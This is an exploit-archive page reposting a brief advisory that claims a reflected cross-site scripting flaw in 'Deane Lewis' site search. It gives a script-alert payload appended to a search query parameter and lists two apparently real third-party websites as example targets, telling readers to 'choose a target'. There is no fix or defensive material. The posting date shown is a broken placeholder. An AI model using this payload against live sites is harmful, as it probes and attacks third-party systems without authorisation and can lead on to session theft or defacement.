Home / os / winmobile

Deane Lewis Cross Site Scripting

Posted on 30 November -0001

<HTML><HEAD><TITLE>Deane Lewis Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |----------------------In The Name Of God------------------------| |[+] Exploit Title: Deane Lewis Cross Site Scripting |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Google Dork: N/A |[+] |[+] Tested on: Win 8.1 / Mozilla Firefox |[+] |[+] Date: 2017 10 February |[+] |--------------------------------------------------------------| |[+] Exploit: |[+] choose a target and add "<script>alert(/XSS Vuln/)</script>" after URL! |[+] To see Vulnerability! |--------------------------------------------------------------| |[+] |[+] Examples : |[+] |[+] http://www.owlpages.com/owls/search.php?q=<script>alert(/XSS Vuln/)</script> |[+] http://dl.id.au/1/search.php?q=<script>alert(/XSS Vuln/)</script> |[+] |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : 1TED |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|</BODY></HTML>

 

TOP